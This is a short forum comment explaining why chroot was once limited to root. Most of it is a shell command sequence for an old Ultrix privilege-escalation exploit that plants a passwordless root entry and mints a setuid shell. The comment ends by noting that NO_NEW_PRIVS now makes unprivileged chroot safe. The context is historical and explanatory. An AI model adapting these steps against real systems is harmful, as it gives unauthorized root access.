|
|
|
|
|
|
by tyingq
1798 days ago
|
|
|
chroot existed, but could only be run as the root user. It was that way to prevent things like this (old actual exploit for Ultrix): $ mkdir /tmp/etc
$ echo root::0:0::/:/bin/sh > /tmp/etc/passwd
$ mkdir /tmp/bin
$ cp /bin/sh /tmp/bin/sh
$ cp /bin/chmod /tmp/bin/chmod
$ chroot /tmp /bin/login
# whoami
root
# chmod 4700 /bin/sh
now, log out of the chroot and use your newly minted setuid shell
Since they now have the "NO_NEW_PRIVS" protection, they can let regular users safely use chroot. |
|
|